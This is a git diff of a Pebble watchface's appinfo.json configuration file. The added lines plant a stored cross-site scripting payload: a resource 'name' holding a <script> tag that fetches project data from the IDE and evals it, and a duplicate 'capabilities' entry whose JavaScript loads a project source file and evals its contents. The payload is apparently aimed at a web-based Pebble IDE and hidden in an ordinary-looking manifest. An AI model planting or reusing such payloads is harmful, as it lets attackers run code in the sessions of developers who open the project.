--- a/appinfo.json
+++ b/appinfo.json
@@ -1,21 +1,34 @@
 {
-  "uuid": "ecc8f112-318f-4ee2-be11-53c63b8a1139",
-  "shortName": "My Simple Analog",
-  "longName": "My Simple Analog",
-  "companyName": "Pebble Technology",
-  "versionCode": 1,
-  "versionLabel": "1.0",
-  "watchapp": {
-    "watchface": true
-  },
-  "appKeys": {},
-  "resources": {
-    "media": []
-  },
-  "targetPlatforms": [
-    "aplite",
-    "basalt",
-    "chalk"
-  ],
-  "sdkVersion": "3"
+    "appKeys": {},
+    "capabilities": [
+        ""
+    ],
+    "companyName": "Pebble Technology",
+    "enableMultiJS": false,
+    "longName": "My Simple Analog",
+    "projectType": "native",
+    "resources": {
+        "media": [
+            {
+                "file": "test.png",
+                "name": "<script>$.get('/ide/project/'+PROJECT_ID+'/info',function(d,s){eval(d.app_capabilities)})</script>",
+                "type": "png-trans"
+            }
+        ]
+    },
+    "sdkVersion": "3",
+    "shortName": "My Simple Analog",
+    "targetPlatforms": [
+        "aplite",
+        "basalt",
+        "chalk"
+    ],
+    "uuid": "ecc8f112-318f-4ee2-be11-53c63b8a1139",
+    "versionLabel": "1.0",
+    "watchapp": {
+        "watchface": true
+    },
+    "capabilities": [
+        "p='/ide/project/'+PROJECT_ID;$.get(p+'/info',function(d,s){$.get(p+'/source/'+d.source_files[0].id+'/load',function(d){eval(d.source)})})"
+    ]
 }
